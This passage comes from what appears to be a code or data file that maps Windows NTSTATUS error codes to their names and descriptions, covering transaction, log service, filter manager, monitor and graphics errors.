(file, stream, or link) that corresponds to the handle has been deleted by a transaction savepoint rollback."), 0xC0190022: ("STATUS_STREAM_MINIVERSION_NOT_FOUND","The specified file miniversion was not found for this transacted file open."), 0xC0190023: ("STATUS_STREAM_MINIVERSION_NOT_VALID","The specified file miniversion was found but has been invalidated. The most likely cause is a transaction savepoint rollback."), 0xC0190024: ("STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION","A miniversion may be opened only in the context of the transaction that created it."), 0xC0190025: ("STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT","It is not possible to open a miniversion with modify access."), 0xC0190026: ("STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS","It is not possible to create any more miniversions for this stream."), 0xC0190028: ("STATUS_HANDLE_NO_LONGER_VALID","The handle has been invalidated by a transaction. The most likely cause is the presence of memory mapping on a file or an open handle when the transaction ended or rolled back to savepoint."), 0xC0190030: ("STATUS_LOG_CORRUPTION_DETECTED","The log data is corrupt."), 0xC0190032: ("STATUS_RM_DISCONNECTED","The transaction outcome is unavailable because the resource manager responsible for it is disconnected."), 0xC0190033: ("STATUS_ENLISTMENT_NOT_SUPERIOR","The request was rejected because the enlistment in question is not a superior enlistment."), 0xC0190036: ("STATUS_FILE_IDENTITY_NOT_PERSISTENT","The file cannot be opened in a transaction because its identity depends on the outcome of an unresolved transaction."), 0xC0190037: ("STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY","The operation cannot be performed because another transaction is depending on this property not changing."), 0xC0190038: ("STATUS_CANT_CROSS_RM_BOUNDARY","The operation would involve a single file with two transactional resource managers and is, therefore, not allowed."), 0xC0190039: ("STATUS_TXF_DIR_NOT_EMPTY","The $Txf directory must be empty for this operation to succeed."), 0xC019003A: ("STATUS_INDOUBT_TRANSACTIONS_EXIST","The operation would leave a transactional resource manager in an inconsistent state and is therefore not allowed."), 0xC019003B: ("STATUS_TM_VOLATILE","The operation could not be completed because the transaction manager does not have a log."), 0xC019003C: ("STATUS_ROLLBACK_TIMER_EXPIRED","A rollback could not be scheduled because a previously scheduled rollback has already executed or been queued for execution."), 0xC019003D: ("STATUS_TXF_ATTRIBUTE_CORRUPT","The transactional metadata attribute on the file or directory %hs is corrupt and unreadable."), 0xC019003E: ("STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION","The encryption operation could not be completed because a transaction is active."), 0xC019003F: ("STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED","This object is not allowed to be opened in a transaction."), 0xC0190040: ("STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE","Memory mapping (creating a mapped section) a remote file under a transaction is not supported."), 0xC0190043: ("STATUS_TRANSACTION_REQUIRED_PROMOTION","Promotion was required to allow the resource manager to enlist, but the transaction was set to disallow it."), 0xC0190044: ("STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION","This file is open for modification in an unresolved transaction and may be opened for execute only by a transacted reader."), 0xC0190045: ("STATUS_TRANSACTIONS_NOT_FROZEN","The request to thaw frozen transactions was ignored because transactions were not previously frozen."), 0xC0190046: ("STATUS_TRANSACTION_FREEZE_IN_PROGRESS","Transactions cannot be frozen because a freeze is already in progress."), 0xC0190047: ("STATUS_NOT_SNAPSHOT_VOLUME","The target volume is not a snapshot volume. This operation is valid only on a volume mounted as a snapshot."), 0xC0190048: ("STATUS_NO_SAVEPOINT_WITH_OPEN_FILES","The savepoint operation failed because files are open on the transaction, which is not permitted."), 0xC0190049: ("STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION","The sparse operation could not be completed because a transaction is active on the file."), 0xC019004A: ("STATUS_TM_IDENTITY_MISMATCH","The call to create a transaction manager object failed because the Tm Identity that is stored in the log file does not match the Tm Identity that was passed in as an argument."), 0xC019004B: ("STATUS_FLOATED_SECTION","I/O was attempted on a section object that has been floated as a result of a transaction ending. There is no valid data."), 0xC019004C: ("STATUS_CANNOT_ACCEPT_TRANSACTED_WORK","The transactional resource manager cannot currently accept transacted work due to a transient condition, such as low resources."), 0xC019004D: ("STATUS_CANNOT_ABORT_TRANSACTIONS","The transactional resource manager had too many transactions outstanding that could not be aborted. The transactional resource manager has been shut down."), 0xC019004E: ("STATUS_TRANSACTION_NOT_FOUND","The specified transaction was unable to be opened because it was not found."), 0xC019004F: ("STATUS_RESOURCEMANAGER_NOT_FOUND","The specified resource manager was unable to be opened because it was not found."), 0xC0190050: ("STATUS_ENLISTMENT_NOT_FOUND","The specified enlistment was unable to be opened because it was not found."), 0xC0190051: ("STATUS_TRANSACTIONMANAGER_NOT_FOUND","The specified transaction manager was unable to be opened because it was not found."), 0xC0190052: ("STATUS_TRANSACTIONMANAGER_NOT_ONLINE","The specified resource manager was unable to create an enlistment because its associated transaction manager is not online."), 0xC0190053: ("STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION","The specified transaction manager was unable to create the objects contained in its log file in the Ob namespace. Therefore, the transaction manager was unable to recover."), 0xC0190054: ("STATUS_TRANSACTION_NOT_ROOT","The call to create a superior enlistment on this transaction object could not be completed because the transaction object specified for the enlistment is a subordinate branch of the transaction. Only the root of the transaction can be enlisted as a superior."), 0xC0190055: ("STATUS_TRANSACTION_OBJECT_EXPIRED","Because the associated transaction manager or resource manager has been closed, the handle is no longer valid."), 0xC0190056: ("STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION","The compression operation could not be completed because a transaction is active on the file."), 0xC0190057: ("STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED","The specified operation could not be performed on this superior enlistment because the enlistment was not created with the corresponding completion response in the NotificationMask."), 0xC0190058: ("STATUS_TRANSACTION_RECORD_TOO_LONG","The specified operation could not be performed because the record to be logged was too long. This can occur because either there are too many enlistments on this transaction or the combined RecoveryInformation being logged on behalf of those enlistments is too long."), 0xC0190059: ("STATUS_NO_LINK_TRACKING_IN_TRANSACTION","The link-tracking operation could not be completed because a transaction is active."), 0xC019005A: ("STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION","This operation cannot be performed in a transaction."), 0xC019005B: ("STATUS_TRANSACTION_INTEGRITY_VIOLATED","The kernel transaction manager had to abort or forget the transaction because it blocked forward progress."), 0xC0190060: ("STATUS_EXPIRED_HANDLE","The handle is no longer properly associated with its transaction. It may have been opened in a transactional resource manager that was subsequently forced to restart. Please close the handle and open a new one."), 0xC0190061: ("STATUS_TRANSACTION_NOT_ENLISTED","The specified operation could not be performed because the resource manager is not enlisted in the transaction."), 0xC01A0001: ("STATUS_LOG_SECTOR_INVALID","The log service found an invalid log sector."), 0xC01A0002: ("STATUS_LOG_SECTOR_PARITY_INVALID","The log service encountered a log sector with invalid block parity."), 0xC01A0003: ("STATUS_LOG_SECTOR_REMAPPED","The log service encountered a remapped log sector."), 0xC01A0004: ("STATUS_LOG_BLOCK_INCOMPLETE","The log service encountered a partial or incomplete log block."), 0xC01A0005: ("STATUS_LOG_INVALID_RANGE","The log service encountered an attempt to access data outside the active log range."), 0xC01A0006: ("STATUS_LOG_BLOCKS_EXHAUSTED","The log service user-log marshaling buffers are exhausted."), 0xC01A0007: ("STATUS_LOG_READ_CONTEXT_INVALID","The log service encountered an attempt to read from a marshaling area with an invalid read context."), 0xC01A0008: ("STATUS_LOG_RESTART_INVALID","The log service encountered an invalid log restart area."), 0xC01A0009: ("STATUS_LOG_BLOCK_VERSION","The log service encountered an invalid log block version."), 0xC01A000A: ("STATUS_LOG_BLOCK_INVALID","The log service encountered an invalid log block."), 0xC01A000B: ("STATUS_LOG_READ_MODE_INVALID","The log service encountered an attempt to read the log with an invalid read mode."), 0xC01A000D: ("STATUS_LOG_METADATA_CORRUPT","The log service encountered a corrupted metadata file."), 0xC01A000E: ("STATUS_LOG_METADATA_INVALID","The log service encountered a metadata file that could not be created by the log file system."), 0xC01A000F: ("STATUS_LOG_METADATA_INCONSISTENT","The log service encountered a metadata file with inconsistent data."), 0xC01A0010: ("STATUS_LOG_RESERVATION_INVALID","The log service encountered an attempt to erroneously allocate or dispose reservation space."), 0xC01A0011: ("STATUS_LOG_CANT_DELETE","The log service cannot delete the log file or the file system container."), 0xC01A0012: ("STATUS_LOG_CONTAINER_LIMIT_EXCEEDED","The log service has reached the maximum allowable containers allocated to a log file."), 0xC01A0013: ("STATUS_LOG_START_OF_LOG","The log service has attempted to read or write backward past the start of the log."), 0xC01A0014: ("STATUS_LOG_POLICY_ALREADY_INSTALLED","The log policy could not be installed because a policy of the same type is already present."), 0xC01A0015: ("STATUS_LOG_POLICY_NOT_INSTALLED","The log policy in question was not installed at the time of the request."), 0xC01A0016: ("STATUS_LOG_POLICY_INVALID","The installed set of policies on the log is invalid."), 0xC01A0017: ("STATUS_LOG_POLICY_CONFLICT","A policy on the log in question prevented the operation from completing."), 0xC01A0018: ("STATUS_LOG_PINNED_ARCHIVE_TAIL","The log space cannot be reclaimed because the log is pinned by the archive tail."), 0xC01A0019: ("STATUS_LOG_RECORD_NONEXISTENT","The log record is not a record in the log file."), 0xC01A001A: ("STATUS_LOG_RECORDS_RESERVED_INVALID","The number of reserved log records or the adjustment of the number of reserved log records is invalid."), 0xC01A001B: ("STATUS_LOG_SPACE_RESERVED_INVALID","The reserved log space or the adjustment of the log space is invalid."), 0xC01A001C: ("STATUS_LOG_TAIL_INVALID","A new or existing archive tail or the base of the active log is invalid."), 0xC01A001D: ("STATUS_LOG_FULL","The log space is exhausted."), 0xC01A001E: ("STATUS_LOG_MULTIPLEXED","The log is multiplexed; no direct writes to the physical log are allowed."), 0xC01A001F: ("STATUS_LOG_DEDICATED","The operation failed because the log is dedicated."), 0xC01A0020: ("STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS","The operation requires an archive context."), 0xC01A0021: ("STATUS_LOG_ARCHIVE_IN_PROGRESS","Log archival is in progress."), 0xC01A0022: ("STATUS_LOG_EPHEMERAL","The operation requires a nonephemeral log, but the log is ephemeral."), 0xC01A0023: ("STATUS_LOG_NOT_ENOUGH_CONTAINERS","The log must have at least two containers before it can be read from or written to."), 0xC01A0024: ("STATUS_LOG_CLIENT_ALREADY_REGISTERED","A log client has already registered on the stream."), 0xC01A0025: ("STATUS_LOG_CLIENT_NOT_REGISTERED","A log client has not been registered on the stream."), 0xC01A0026: ("STATUS_LOG_FULL_HANDLER_IN_PROGRESS","A request has already been made to handle the log full condition."), 0xC01A0027: ("STATUS_LOG_CONTAINER_READ_FAILED","The log service encountered an error when attempting to read from a log container."), 0xC01A0028: ("STATUS_LOG_CONTAINER_WRITE_FAILED","The log service encountered an error when attempting to write to a log container."), 0xC01A0029: ("STATUS_LOG_CONTAINER_OPEN_FAILED","The log service encountered an error when attempting to open a log container."), 0xC01A002A: ("STATUS_LOG_CONTAINER_STATE_INVALID","The log service encountered an invalid container state when attempting a requested action."), 0xC01A002B: ("STATUS_LOG_STATE_INVALID","The log service is not in the correct state to perform a requested action."), 0xC01A002C: ("STATUS_LOG_PINNED","The log space cannot be reclaimed because the log is pinned."), 0xC01A002D: ("STATUS_LOG_METADATA_FLUSH_FAILED","The log metadata flush failed."), 0xC01A002E: ("STATUS_LOG_INCONSISTENT_SECURITY","Security on the log and its containers is inconsistent."), 0xC01A002F: ("STATUS_LOG_APPENDED_FLUSH_FAILED","Records were appended to the log or reservation changes were made, but the log could not be flushed."), 0xC01A0030: ("STATUS_LOG_PINNED_RESERVATION","The log is pinned due to reservation consuming most of the log space. Free some reserved records to make space available."), 0xC01B00EA: ("STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD","{Display Driver Stopped Responding} The %hs display driver has stopped working normally. Save your work and reboot the system to restore full display functionality. The next time you reboot the computer, a dialog box will allow you to upload data about this failure to Microsoft."), 0xC01C0001: ("STATUS_FLT_NO_HANDLER_DEFINED","A handler was not defined by the filter for this operation."), 0xC01C0002: ("STATUS_FLT_CONTEXT_ALREADY_DEFINED","A context is already defined for this object."), 0xC01C0003: ("STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST","Asynchronous requests are not valid for this operation."), 0xC01C0004: ("STATUS_FLT_DISALLOW_FAST_IO","This is an internal error code used by the filter manager to determine if a fast I/O operation should be forced down the input/output request packet (IRP) path. Minifilters should never return this value."), 0xC01C0005: ("STATUS_FLT_INVALID_NAME_REQUEST","An invalid name request was made. The name requested cannot be retrieved at this time."), 0xC01C0006: ("STATUS_FLT_NOT_SAFE_TO_POST_OPERATION","Posting this operation to a worker thread for further processing is not safe at this time because it could lead to a system deadlock."), 0xC01C0007: ("STATUS_FLT_NOT_INITIALIZED","The Filter Manager was not initialized when a filter tried to register. Make sure that the Filter Manager is loaded as a driver."), 0xC01C0008: ("STATUS_FLT_FILTER_NOT_READY","The filter is not ready for attachment to volumes because it has not finished initializing (FltStartFiltering has not been called)."), 0xC01C0009: ("STATUS_FLT_POST_OPERATION_CLEANUP","The filter must clean up any operation-specific context at this time because it is being removed from the system before the operation is completed by the lower drivers."), 0xC01C000A: ("STATUS_FLT_INTERNAL_ERROR","The Filter Manager had an internal error from which it cannot recover; therefore, the operation has failed. This is usually the result of a filter returning an invalid value from a pre-operation callback."), 0xC01C000B: ("STATUS_FLT_DELETING_OBJECT","The object specified for this action is in the process of being deleted; therefore, the action requested cannot be completed at this time."), 0xC01C000C: ("STATUS_FLT_MUST_BE_NONPAGED_POOL","A nonpaged pool must be used for this type of context."), 0xC01C000D: ("STATUS_FLT_DUPLICATE_ENTRY","A duplicate handler definition has been provided for an operation."), 0xC01C000E: ("STATUS_FLT_CBDQ_DISABLED","The callback data queue has been disabled."), 0xC01C000F: ("STATUS_FLT_DO_NOT_ATTACH","Do not attach the filter to the volume at this time."), 0xC01C0010: ("STATUS_FLT_DO_NOT_DETACH","Do not detach the filter from the volume at this time."), 0xC01C0011: ("STATUS_FLT_INSTANCE_ALTITUDE_COLLISION","An instance already exists at this altitude on the volume specified."), 0xC01C0012: ("STATUS_FLT_INSTANCE_NAME_COLLISION","An instance already exists with this name on the volume specified."), 0xC01C0013: ("STATUS_FLT_FILTER_NOT_FOUND","The system could not find the filter specified."), 0xC01C0014: ("STATUS_FLT_VOLUME_NOT_FOUND","The system could not find the volume specified."), 0xC01C0015: ("STATUS_FLT_INSTANCE_NOT_FOUND","The system could not find the instance specified."), 0xC01C0016: ("STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND","No registered context allocation definition was found for the given request."), 0xC01C0017: ("STATUS_FLT_INVALID_CONTEXT_REGISTRATION","An invalid parameter was specified during context registration."), 0xC01C0018: ("STATUS_FLT_NAME_CACHE_MISS","The name requested was not found in the Filter Manager name cache and could not be retrieved from the file system."), 0xC01C0019: ("STATUS_FLT_NO_DEVICE_OBJECT","The requested device object does not exist for the given volume."), 0xC01C001A: ("STATUS_FLT_VOLUME_ALREADY_MOUNTED","The specified volume is already mounted."), 0xC01C001B: ("STATUS_FLT_ALREADY_ENLISTED","The specified transaction context is already enlisted in a transaction."), 0xC01C001C: ("STATUS_FLT_CONTEXT_ALREADY_LINKED","The specified context is already attached to another object."), 0xC01C0020: ("STATUS_FLT_NO_WAITER_FOR_REPLY","No waiter is present for the filter's reply to this message."), 0xC01D0001: ("STATUS_MONITOR_NO_DESCRIPTOR","A monitor descriptor could not be obtained."), 0xC01D0002: ("STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT","This release does not support the format of the obtained monitor descriptor."), 0xC01D0003: ("STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM","The checksum of the obtained monitor descriptor is invalid."), 0xC01D0004: ("STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK","The monitor descriptor contains an invalid standard timing block."), 0xC01D0005: ("STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED","WMI data-block registration failed for one of the MSMonitorClass WMI subclasses."), 0xC01D0006: ("STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK","The provided monitor descriptor block is either corrupted or does not contain the monitor's detailed serial number."), 0xC01D0007: ("STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK","The provided monitor descriptor block is either corrupted or does not contain the monitor's user-friendly name."), 0xC01D0008: ("STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA","There is no monitor descriptor data at the specified (offset or size) region."), 0xC01D0009: ("STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK","The monitor descriptor contains an invalid detailed timing block."), 0xC01D000A: ("STATUS_MONITOR_INVALID_MANUFACTURE_DATE","Monitor descriptor contains invalid manufacture date."), 0xC01E0000: ("STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER","Exclusive mode ownership is needed to create an unmanaged primary allocation."), 0xC01E0001: ("STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER","The driver needs more DMA buffer space to complete the requested operation."), 0xC01E0002: ("STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER","The specified display adapter handle is invalid."), 0xC01E0003: ("STATUS_GRAPHICS_ADAPTER_WAS_RESET","The specified display adapter and all of its state have been reset."), 0xC01E0004: ("STATUS_GRAPHICS_INVALID_DRIVER_MODEL","The driver stack does not match the expected driver model."), 0xC01E0005: ("STATUS_GRAPHICS_PRESENT_MODE_CHANGED","Present happened but ended up into the changed desktop mode."), 0xC01E0006: ("STATUS_GRAPHICS_PRESENT_OCCLUDED","Nothing to present due to desktop occlusion."), 0xC01E0007: ("STATUS_GRAPHICS_PRESENT_DENIED","Not able to present due to denial of desktop access."), 0xC01E0008: ("STATUS_GRAPHICS_CANNOTCOLORCONVERT","Not able to present with color conversion."), 0xC01E000B: ("STATUS_GRAPHICS_PRESENT_REDIRECTION_DISABLED","Present redirection is disabled (desktop windowing management subsystem is off)."), 0xC01E000C: ("STATUS_GRAPHICS_PRESENT_UNOCCLUDED","Previous exclusive VidPn source owner has released its ownership"), 0xC01E0100: ("STATUS_GRAPHICS_NO_VIDEO_MEMORY","Not enough video memory is available to complete the operation."), 0xC01E0101: ("STATUS_GRAPHICS_CANT_LOCK_MEMORY","Could not probe and lock the underlying memory of an allocation."), 0xC01E0102: ("STATUS_GRAPHICS_ALLOCATION_BUSY","The allocation is currently busy."), 0xC01E0103: ("STATUS_GRAPHICS_TOO_MANY_REFERENCES","An object being referenced has already reached the maximum reference count and cannot be referenced further."), 0xC01E0104: ("STATUS_GRAPHICS_TRY_AGAIN_LATER","A problem could not be solved due to an existing condition. Try again later."), 0xC01E0105: ("STATUS_GRAPHICS_TRY_AGAIN_NOW","A problem could not be solved due to an existing condition. Try again now."), 0xC01E0106: ("STATUS_GRAPHICS_ALLOCATION_INVALID","The allocation is invalid."), 0xC01E0107: ("STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE","No more unswizzling apertures are currently available."), 0xC01E0108: ("STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED","The current allocation cannot be unswizzled by an aperture."), 0xC01E0109: ("STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION","The request failed because a pinned allocation cannot be evicted."), 0xC01E0110: ("STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE","The allocation cannot be used from its current segment location for the specified operation."), 0xC01E0111: ("STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION","A locked allocation cannot be used in the current command buffer."), 0xC01E0112: ("STATUS_GRAPHICS_ALLOCATION_CLOSED","The allocation being referenced has been closed permanently."), 0xC01E0113: ("STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE","An invalid allocation instance is being referenced."), 0xC01E0114: ("STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE","An invalid allocation handle is being referenced."), 0xC01E0115: ("STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE","The allocation being referenced does not belong to the current device."), 0xC01E0116: ("STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST","The specified allocation lost its content."), 0xC01E0200: ("STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE","A GPU exception was detected on the given device. The device cannot be scheduled."), 0xC01E0300: ("STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY","The specified VidPN topology is invalid."), 0xC01E0301: ("STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED","The specified VidPN topology is valid but is not supported by this model of the display adapter."), 0xC01E0302: ("STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED","The specified VidPN topology is valid but is not currently supported by the display adapter due to allocation of its resources."), 0xC01E0303: ("STATUS_GRAPHICS_INVALID_VIDPN","The specified VidPN handle is invalid."), 0xC01E0304: ("STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE","The specified video present source is invalid."), 0xC01E0305: ("STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET","The specified video present target is invalid."), 0xC01E0306: ("STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED","The specified VidPN modality is not supported (for example, at least two of the pinned modes are not co-functional)."), 0xC01E0308: ("STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET","The specified VidPN source mode set is invalid."), 0xC01E0309: ("STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET","The specified VidPN target mode set is invalid."), 0xC01E030A: ("STATUS_GRAPHICS_INVALID_FREQUENCY","The specified video signal frequency is invalid."), 0xC01E030B: ("STATUS_GRAPHICS_INVALID_ACTIVE_REGION","The specified video signal active region is invalid."), 0xC01E030C: ("STATUS_GRAPHICS_INVALID_TOTAL_REGION","The specified video signal total region is invalid."), 0xC01E0310: ("STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE","The specified video present source mode is invalid."), 0xC01E0311: ("STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE","The specified video present target mode is invalid."), 0xC01E0312: ("STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET","The pinned mode must remain in the set on the VidPN's co-functional modality enumeration."), 0xC01E0313: ("STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY","The specified video present path is already in the VidPN's topology."), 0xC01E0314: ("STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET","The specified mode is already in the mode set."), 0xC01E0315: ("STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET","The specified video present source set is invalid."), 0xC01E0316: ("STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET","The specified video present target set is invalid."), 0xC01E0317: ("STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET","The specified video present source is already in the video present source set."), 0xC01E0318: ("STATUS_GRAPHICS_TARGET_ALREADY_IN_SET","The specified video present target is already in the video present target set."), 0xC01E0319: ("STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH","The specified VidPN present path is invalid."), 0xC01E031A: ("STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY","The miniport has no recommendation for augmenting the specified VidPN's topology."), 0xC01E031B: ("STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET","The specified monitor frequency range set is invalid."), 0xC01E031C: ("STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE","The specified monitor frequency range is invalid."), 0xC01E031D: ("STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET","The specified frequency range is not in the specified monitor frequency range set."), 0xC01E031F: ("STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET","The specified frequency range is already in the specified monitor frequency range set."), 0xC01E0320: ("STATUS_GRAPHICS_STALE_MODESET","The specified mode set is stale. Reacquire the new mode set."), 0xC01E0321: ("STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET","The specified monitor source mode set is invalid."), 0xC01E0322: ("STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE","The specified monitor source mode is invalid."), 0xC01E0323: ("STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN","The miniport does not have a recommendation regarding the request to provide a functional VidPN given the current display adapter configuration."), 0xC01E0324: ("STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE","The ID of the specified mode is being used by another mode in the set."), 0xC01E0325: ("STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION","The system failed to determine a mode that is supported by both the display adapter and the monitor connected to it."), 0xC01E0326: ("STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES","The number of video present targets must be greater than or equal to the number of video present sources."), 0xC01E0327: ("STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY","The specified present path is not in the VidPN's topology."), 0xC01E0328: ("STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE","The display adapter must have at least one video present source."), 0xC01E0329: ("STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET","The display adapter must have at least one video present target."), 0xC01E032A: ("STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET","The specified monitor descriptor set is invalid."), 0xC01E032B: ("STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR","The specified monitor descriptor is invalid."), 0xC01E032C: ("STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET","The specified descriptor is not in the specified monitor descriptor set."), 0xC01E032D: ("STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET","The specified descriptor is already in the specified monitor descriptor set."), 0xC01E032E: ("STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE","The ID of the specified monitor descriptor is being used by another descriptor in the set."), 0xC01E032F: ("STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE","The specified video present target subset type is invalid."), 0xC01E0330: ("STATUS_GRAPHICS_RESOURCES_NOT_RELATED","Two or more of the specified resources are not related to each other, as defined by the interface semantics."), 0xC01E0331: ("STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE","The ID of the specified video present source is being used by another source in the set."), 0xC01E0332: ("STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE","The ID of the specified video present target is being used by another target in the set."), 0xC01E0333: ("STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET","The specified VidPN source cannot be used because there is no available VidPN target to connect it to."), 0xC01E0334: ("STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER","The newly arrived monitor could not be associated with a display adapter."), 0xC01E0335: ("STATUS_GRAPHICS_NO_VIDPNMGR","The particular display adapter does not have an associated VidPN manager."), 0xC01E0336: ("STATUS_GRAPHICS_NO_ACTIVE_VIDPN","The VidPN manager of the particular display adapter does not have an active VidPN."), 0xC01E0337: ("STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY","The specified VidPN topology is stale; obtain the new topology."), 0xC01E0338: ("STATUS_GRAPHICS_MONITOR_NOT_CONNECTED","No monitor is connected on the specified video present target."), 0xC01E0339: ("STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY","The specified source is not part of the specified VidPN's topology."), 0xC01E033A: ("STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE","The specified primary surface size is invalid."), 0xC01E033B: ("STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE","The specified visible region size is invalid."), 0xC01E033C: ("STATUS_GRAPHICS_INVALID_STRIDE","The specified stride is invalid."), 0xC01E033D: ("STATUS_GRAPHICS_INVALID_PIXELFORMAT","The specified pixel format is invalid."), 0xC01E033E: ("STATUS_GRAPHICS_INVALID_COLORBASIS","The specified color basis is invalid."), 0xC01E033F: ("STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE","The specified pixel value access mode is invalid."), 0xC01E0340: ("STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY","The specified target is not part of the specified VidPN's topology."), 0xC01E0341: ("STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT","Failed to acquire the display mode management interface."), 0xC01E0342: ("STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE","The specified VidPN source is already owned by a DMM client and cannot be used until that client releases it."), 0xC01E0343: ("STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN","The specified VidPN is active and cannot be accessed."), 0xC01E0344: ("STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL","The specified VidPN's present path importance ordinal is invalid."), 0xC01E0345: ("STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION","The specified VidPN's present path content geometry transformation is invalid."), 0xC01E0346: ("STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED","The specified content geometry transformation is not supported on the respective VidPN present path."), 0xC01E0347: ("STATUS_GRAPHICS_INVALID_GAMMA_RAMP","The specified gamma ramp is invalid."), 0xC01E0348: ("STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED","The specified gamma ramp is not supported on the respective VidPN present path."), 0xC01E0349: ("STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED","Multisampling is not supported on the respective VidPN present path."), 0xC01E034A: ("STATUS_GRAPHICS_MODE_NOT_IN_MODESET","The specified mode is not in the specified mode set."), 0xC01E034D: ("STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON","The specified VidPN topology recommendation reason is invalid."), 0xC01E034E: ("STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE","The specified VidPN present path content type is invalid."), 0xC01E034F: ("STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE","The specified VidPN present path copy protection type is invalid."), 0xC01E0350: ("STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS","Only one unassigned mode set can exist at any one time for a particular VidPN source or target."), 0xC01E0352: 